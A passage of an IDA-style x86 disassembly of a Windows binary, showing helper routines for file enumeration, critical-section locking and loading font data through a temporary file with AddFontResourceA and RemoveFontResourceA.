jbe short loc_4D4545
mov [ebp+var_58], 0Eh
jmp short loc_4D454B
; ---------------------------------------------------------------------------
loc_4D4545: ; CODE XREF: sub_4D4252+2E8�j
mov eax, [ebp+var_48]
mov [ebp+var_58], eax
loc_4D454B: ; CODE XREF: sub_4D4252+2F1�j
mov ecx, [ebp+var_58]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 130h
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
movzx eax, [ebp+var_30]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_44]
mov ecx, [ecx+8]
mov [eax+20h], ecx
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+4], edx
mov eax, [eax+20h]
mov [ecx+8], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+0Ch], edx
mov eax, [eax+20h]
mov [ecx+10h], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+14h], edx
mov eax, [eax+20h]
mov [ecx+18h], eax
cmp [ebp+arg_8], 0
jz short loc_4D45D2
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_40]
mov [eax], ecx
loc_4D45D2: ; CODE XREF: sub_4D4252+376�j
push 0FFFFFFFFh
mov [ebp+var_5C], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_5C]
jmp short loc_4D462D
; ---------------------------------------------------------------------------
loc_4D45EB: ; CODE XREF: sub_4D4252+15A�j
; sub_4D4252+1C8�j
cmp [ebp+arg_8], 0
jz short loc_4D460C
mov eax, ds:dword_4E6908
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_4E6908
mov ecx, [ecx+8]
add ecx, eax
mov eax, [ebp+arg_8]
mov [eax], ecx
loc_4D460C: ; CODE XREF: sub_4D4252+39D�j
push 12h
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
loc_4D4614: ; CODE XREF: sub_4D4252+D1�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D461F
jmp short loc_4D462B
sub_4D4252 endp
; =============== S U B R O U T I N E =======================================
sub_4D461F proc near ; CODE XREF: sub_4D4252+3C6�p
; DATA XREF: _5:004E32D8�o
push offset dword_4E68C8
call ds:dword_4E6754 ;; RtlLeaveCriticalSection
retn
sub_4D461F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D4252
loc_4D462B: ; CODE XREF: sub_4D4252+3CB�j
xor eax, eax
loc_4D462D: ; CODE XREF: sub_4D4252+51�j
; sub_4D4252+13A�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4D4252
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D463E proc near ; CODE XREF: sub_4DF334+E�p
; sub_4DF361+7D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+arg_8]
or dword ptr [eax], 0FFFFFFFFh
push 0Ch
call sub_4DD35A
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4D467B
mov eax, [ebp+var_8]
and dword ptr [eax], 0
mov eax, [ebp+var_8]
and dword ptr [eax+4], 0
mov eax, [ebp+var_8]
and dword ptr [eax+8], 0
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
jmp short loc_4D467F
; ---------------------------------------------------------------------------
loc_4D467B: ; CODE XREF: sub_4D463E+1F�j
and [ebp+var_C], 0
loc_4D467F: ; CODE XREF: sub_4D463E+3B�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and dword ptr [eax], 0
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D4252
test eax, eax
jz short loc_4D46D8
push 0
push [ebp+arg_0]
call sub_4DE2CA
pop ecx
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+4], eax
mov eax, [ebp+var_4]
and dword ptr [eax+8], 0
push [ebp+var_4]
push [ebp+var_4]
mov ecx, ds:dword_4E68EC
call sub_4D1000
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov [eax], ecx
and [ebp+var_4], 0
push 1
pop eax
jmp short locret_4D46DA
; ---------------------------------------------------------------------------
loc_4D46D8: ; CODE XREF: sub_4D463E+5D�j
xor eax, eax
locret_4D46DA: ; CODE XREF: sub_4D463E+98�j
leave
retn 0Ch
sub_4D463E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D46DE proc near ; CODE XREF: sub_4DF626+12�p
; sub_4DF657+19�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004D4805 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E32F0
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_4E68EC
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D4724
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4D4728
; ---------------------------------------------------------------------------
loc_4D4724: ; CODE XREF: sub_4D46DE+31�j
and [ebp+var_24], 0
loc_4D4728: ; CODE XREF: sub_4D46DE+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_4D4805
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68EC
call sub_4E0871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_4D47DE
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_4D4778
push [ebp+var_1C]
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call sub_4D4252
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_4D4778: ; CODE XREF: sub_4D46DE+82�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jnz short loc_4D47C5
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_4D47B1
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call ds:dword_4E66D0 ;; FindFirstFileA
mov ecx, [ebp+var_1C]
mov [ecx+8], eax
mov eax, [ebp+var_1C]
xor ecx, ecx
cmp dword ptr [eax+8], 0FFFFFFFFh
setnz cl
mov eax, [ebp+arg_8]
mov [eax], ecx
jmp short loc_4D47C5
; ---------------------------------------------------------------------------
loc_4D47B1: ; CODE XREF: sub_4D46DE+A9�j
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_4E66D4 ;; FindNextFileA
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_4D47C5: ; CODE XREF: sub_4D46DE+A0�j
; sub_4D46DE+D1�j
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4D4807
; ---------------------------------------------------------------------------
loc_4D47DE: ; CODE XREF: sub_4D46DE+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D47E9
jmp short loc_4D4805
sub_4D46DE endp
; =============== S U B R O U T I N E =======================================
sub_4D47E9 proc near ; CODE XREF: sub_4D46DE+104�p
mov eax, ds:dword_4E68EC
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_4D4804
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D4804: ; CODE XREF: sub_4D47E9+C�j
retn
sub_4D47E9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D46DE
loc_4D4805: ; CODE XREF: sub_4D46DE+50�j
; sub_4D46DE+109�j
xor eax, eax
loc_4D4807: ; CODE XREF: sub_4D46DE+FE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4D46DE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4818 proc near ; CODE XREF: sub_4D5741+CE�p
; sub_4DF5FF+B�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D4939 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3300
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
mov eax, ds:dword_4E68EC
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_4D485E
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_4D4862
; ---------------------------------------------------------------------------
loc_4D485E: ; CODE XREF: sub_4D4818+31�j
and [ebp+var_2C], 0
loc_4D4862: ; CODE XREF: sub_4D4818+44�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_4D4939
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68EC
call sub_4E0871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_4D4912
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jz short loc_4D48A2
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_4E66A4 ;; CloseHandle
loc_4D48A2: ; CODE XREF: sub_4D4818+7C�j
push [ebp+arg_0]
mov ecx, ds:dword_4E68EC
call sub_4E08E0
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D48EC
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_4DD3DD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_4D48E4
push [ebp+var_20]
call sub_4DD3DD
pop ecx
loc_4D48E4: ; CODE XREF: sub_4D4818+C1�j
mov eax, [ebp+var_20]
mov [ebp+var_38], eax
jmp short loc_4D48F0
; ---------------------------------------------------------------------------
loc_4D48EC: ; CODE XREF: sub_4D4818+A5�j
and [ebp+var_38], 0
loc_4D48F0: ; CODE XREF: sub_4D4818+D2�j
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_4D493B
; ---------------------------------------------------------------------------
loc_4D4912: ; CODE XREF: sub_4D4818+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4D491D
jmp short loc_4D4939
sub_4D4818 endp
; =============== S U B R O U T I N E =======================================
sub_4D491D proc near ; CODE XREF: sub_4D4818+FE�p
; DATA XREF: _5:004E3308�o
mov eax, ds:dword_4E68EC
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_4D4938
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D4938: ; CODE XREF: sub_4D491D+C�j
retn
sub_4D491D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D4818
loc_4D4939: ; CODE XREF: sub_4D4818+50�j
; sub_4D4818+103�j
xor eax, eax
loc_4D493B: ; CODE XREF: sub_4D4818+F8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4D4818
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D494C proc near ; CODE XREF: sub_4E023E+20�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004D4AAF SIZE 000001F8 BYTES
; FUNCTION CHUNK AT 004D4D11 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3310
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
or [ebp+var_28], 0FFFFFFFFh
and [ebp+var_2C], 0
and [ebp+var_1C], 0
and [ebp+var_24], 0
push 0
lea eax, [ebp+var_20]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_4D5346
test eax, eax
jz loc_4D4D11
cmp [ebp+var_20], 0FFFFFFFFh
jz loc_4D4D11
mov eax, ds:dword_4E68E4
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_4D49D0
mov eax, [ebp+var_6C]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_70], 1
jmp short loc_4D49D4
; ---------------------------------------------------------------------------
loc_4D49D0: ; CODE XREF: sub_4D494C+6F�j
and [ebp+var_70], 0
loc_4D49D4: ; CODE XREF: sub_4D494C+82�j
movzx eax, [ebp+var_70]
test eax, eax
jz loc_4D4D11
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_20]
mov ecx, ds:dword_4E68E4
call sub_4E0871
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
cmp [ebp+var_30], 0
jnz short loc_4D4A1E
push ds:off_4E34F8
push 22h
push ds:off_4E34FC
call sub_4DD48C
loc_4D4A1E: ; CODE XREF: sub_4D494C+BD�j
mov eax, ds:dword_4E68E8
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_4D4A3F
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_78], 1
jmp short loc_4D4A43
; ---------------------------------------------------------------------------
loc_4D4A3F: ; CODE XREF: sub_4D494C+DE�j
and [ebp+var_78], 0
loc_4D4A43: ; CODE XREF: sub_4D494C+F1�j
movzx eax, [ebp+var_78]
test eax, eax
jz short loc_4D4AAF
mov [ebp+var_4], 1
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_4E68E8
call sub_4E0871
test eax, eax
jz short loc_4D4A88
push 0FFFFFFFFh
mov [ebp+var_84], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp loc_4D4D13
; ---------------------------------------------------------------------------
loc_4D4A88: ; CODE XREF: sub_4D494C+118�j
and [ebp+var_4], 0
call sub_4D4A93
jmp short loc_4D4AAF
sub_4D494C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4D4A93 proc near ; CODE XREF: sub_4D494C+140�p
; DATA XREF: _5:004E3324�o
mov eax, ds:dword_4E68E8
mov [ebp-7Ch], eax
cmp dword ptr [ebp-7Ch], 0
jz short locret_4D4AAE
mov eax, [ebp-7Ch]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D4AAE: ; CODE XREF: sub_4D4A93+C�j
retn
sub_4D4A93 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D494C
loc_4D4AAF: ; CODE XREF: sub_4D494C+FD�j
; sub_4D494C+145�j
push 104h
call sub_4DD35A
pop ecx
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
mov [ebp+var_2C], eax
push 104h
call sub_4DD35A
pop ecx
mov [ebp+var_54], eax
mov eax, [ebp+var_54]
mov [ebp+var_1C], eax
push [ebp+var_1C]
push 104h
call ds:dword_4E6734 ;; GetTempPathA
push [ebp+var_2C]
push 0
push offset aMbx ; "mbx"
push [ebp+var_1C]
call ds:dword_4E6730 ;; GetTempFileNameA
push 0
push 0
push 4
push 0
push 1
push 40000000h
push [ebp+var_2C]
call ds:dword_4E66A8 ;; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_4D4B3B
push 0FFFFFFFFh
mov [ebp+var_88], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_88]
jmp loc_4D4D13
; ---------------------------------------------------------------------------
loc_4D4B3B: ; CODE XREF: sub_4D494C+1CB�j
push 1000h
call sub_4DD35A
pop ecx
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
mov [ebp+var_24], eax
and [ebp+var_38], 0
loc_4D4B53: ; CODE XREF: sub_4D494C+2BF�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
cmp ecx, [eax+8]
jnb loc_4D4C10
mov eax, [ebp+var_34]
mov eax, [eax+8]
mov [ebp+var_48], eax
cmp [ebp+var_48], 1000h
jbe short loc_4D4B7B
mov [ebp+var_48], 1000h
loc_4D4B7B: ; CODE XREF: sub_4D494C+226�j
lea eax, [ebp+var_40]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push [ebp+var_48]
push [ebp+var_24]
push [ebp+var_20]
call sub_4D6177
test eax, eax
jz short loc_4D4B9D
cmp [ebp+var_40], 0
jnz short loc_4D4BBF
loc_4D4B9D: ; CODE XREF: sub_4D494C+249�j
push 0FFFFFFFFh
mov [ebp+var_8C], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_8C]
jmp loc_4D4D13
; ---------------------------------------------------------------------------
loc_4D4BBF: ; CODE XREF: sub_4D494C+24F�j
push 0
lea eax, [ebp+var_44]
push eax
push [ebp+var_3C]
push [ebp+var_24]
push [ebp+var_28]
call ds:dword_4E67BC ;; WriteFile
test eax, eax
jz short loc_4D4BE0
mov eax, [ebp+var_44]
cmp eax, [ebp+var_3C]
jz short loc_4D4C02
loc_4D4BE0: ; CODE XREF: sub_4D494C+28A�j
push 0FFFFFFFFh
mov [ebp+var_90], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_90]
jmp loc_4D4D13
; ---------------------------------------------------------------------------
loc_4D4C02: ; CODE XREF: sub_4D494C+292�j
mov eax, [ebp+var_38]
add eax, [ebp+var_3C]
mov [ebp+var_38], eax
jmp loc_4D4B53
; ---------------------------------------------------------------------------
loc_4D4C10: ; CODE XREF: sub_4D494C+210�j
push [ebp+var_28]
call ds:dword_4E66A4 ;; CloseHandle
or [ebp+var_28], 0FFFFFFFFh
push [ebp+var_2C]
call ds:dword_4E67DC ;; AddFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_4D4C3C
push [ebp+var_2C]
call ds:dword_4E66C0 ;; DeleteFileA
loc_4D4C3C: ; CODE XREF: sub_4D494C+2E5�j
push 8
call sub_4DD35A
pop ecx
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jz short loc_4D4C67
mov eax, [ebp+var_5C]
and dword ptr [eax], 0
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_2C]
mov [eax+4], ecx
mov eax, [ebp+var_5C]
mov [ebp+var_94], eax
jmp short loc_4D4C6E
; ---------------------------------------------------------------------------
loc_4D4C67: ; CODE XREF: sub_4D494C+2FF�j
and [ebp+var_94], 0
loc_4D4C6E: ; CODE XREF: sub_4D494C+319�j
push [ebp+var_94]
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_4E68E8
call sub_4D1000
and [ebp+var_2C], 0
push 0FFFFFFFFh
mov [ebp+var_98], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_98]
jmp short loc_4D4D13
; END OF FUNCTION CHUNK FOR sub_4D494C
; =============== S U B R O U T I N E =======================================
sub_4D4CA7 proc near ; DATA XREF: _5:004E3318�o
mov eax, ds:dword_4E68E4
mov [ebp-80h], eax
cmp dword ptr [ebp-80h], 0
jz short loc_4D4CC2
mov eax, [ebp-80h]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
loc_4D4CC2: ; CODE XREF: sub_4D4CA7+C�j
cmp dword ptr [ebp-20h], 0FFFFFFFFh
jz short loc_4D4CD4
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-20h]
call sub_4D5741
loc_4D4CD4: ; CODE XREF: sub_4D4CA7+1F�j
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jz short loc_4D4CE3
push dword ptr [ebp-28h]
call ds:dword_4E66A4 ;; CloseHandle
loc_4D4CE3: ; CODE XREF: sub_4D4CA7+31�j
mov eax, [ebp-2Ch]
mov [ebp-60h], eax
push dword ptr [ebp-60h]
call sub_4DD3DD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-64h], eax
push dword ptr [ebp-64h]
call sub_4DD3DD
pop ecx
mov eax, [ebp-24h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_4DD3DD
pop ecx
retn
sub_4D4CA7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D494C
loc_4D4D11: ; CODE XREF: sub_4D494C+53�j
; sub_4D494C+5D�j ...
xor eax, eax
loc_4D4D13: ; CODE XREF: sub_4D494C+137�j
; sub_4D494C+1EA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4D494C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4D24 proc near ; CODE XREF: sub_4E0277+20�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3328
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 34h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
and [ebp+var_1C], 0
push 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_4D653F
test eax, eax
jz loc_4D4EBA
movzx eax, [ebp+var_24]
test eax, eax
jnz loc_4D4EBA
mov eax, ds:dword_4E68E8
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_4D4D98
mov eax, [ebp+var_34]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_38], 1
jmp short loc_4D4D9C
; ---------------------------------------------------------------------------
loc_4D4D98: ; CODE XREF: sub_4D4D24+5F�j
and [ebp+var_38], 0
loc_4D4D9C: ; CODE XREF: sub_4D4D24+72�j
movzx eax, [ebp+var_38]
test eax, eax
jz loc_4D4EBA
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_4E68E8
call sub_4E0871
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_4D4E88
mov eax, [ebp+var_28]
cmp dword ptr [eax], 0
jz short loc_4D4DE8
push ds:off_4E34F8
push 70h
push ds:off_4E34FC
call sub_4DD48C
loc_4D4DE8: ; CODE XREF: sub_4D4D24+AF�j
mov eax, [ebp+var_28]
cmp dword ptr [eax+4], 0
jnz short loc_4D4E04
push ds:off_4E34F8
push 71h
push ds:off_4E34FC
call sub_4DD48C
loc_4D4E04: ; CODE XREF: sub_4D4D24+CB�j
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_4E67EC ;; RemoveFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_4E66C0 ;; DeleteFileA
push [ebp+var_1C]
mov ecx, ds:dword_4E68E8
call sub_4E08E0
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4D4E6B
mov eax, [ebp+var_2C]
mov eax, [eax+4]
mov [ebp+var_3C], eax
push [ebp+var_3C]
call sub_4DD3DD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_4D4E63
push [ebp+var_2C]
call sub_4DD3DD
pop ecx
loc_4D4E63: ; CODE XREF: sub_4D4D24+134�j
mov eax, [ebp+var_2C]
mov [ebp+var_44], eax
jmp short loc_4D4E6F
; ---------------------------------------------------------------------------
loc_4D4E6B: ; CODE XREF: sub_4D4D24+118�j
and [ebp+var_44], 0
loc_4D4E6F: ; CODE XREF: sub_4D4D24+145�j
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp short loc_4D4EBC
; ---------------------------------------------------------------------------
loc_4D4E88: ; CODE XREF: sub_4D4D24+A3�j
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp short loc_4D4EBC
; ---------------------------------------------------------------------------
loc_4D4E9E: ; DATA XREF: _5:004E3330�o
mov eax, ds:dword_4E68E8
mov [ebp+var_40], eax
cmp [ebp+var_40], 0
jz short locret_4D4EB9
mov eax, [ebp+var_40]
add eax, 10h
push eax
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
locret_4D4EB9: ; CODE XREF: sub_4D4D24+186�j
retn
; ---------------------------------------------------------------------------
loc_4D4EBA: ; CODE XREF: sub_4D4D24+41�j
; sub_4D4D24+4D�j ...
xor eax, eax
loc_4D4EBC: ; CODE XREF: sub_4D4D24+162�j
; sub_4D4D24+178�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4D4D24 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4ECD proc near ; CODE XREF: sub_4E055B+B�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3338
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
mov eax, ds:dword_4E68E0
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4D4F13
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4D4F17
; ---------------------------------------------------------------------------
loc_4D4F13: ; CODE XREF: sub_4D4ECD+31�j
and [ebp+var_24], 0
loc_4D4F17: ; CODE XREF: sub_4D4ECD+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_4D4FAC
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E68E0
call sub_4E0871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_4D4F54
push 0FFFFFFFFh
and [ebp+var_2C], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4D4FAE
; ---------------------------------------------------------------------------
loc_4D4F54: ; CODE XREF: sub_4D4ECD+6F�j
push 8000h
push 0
push [ebp+arg_0]
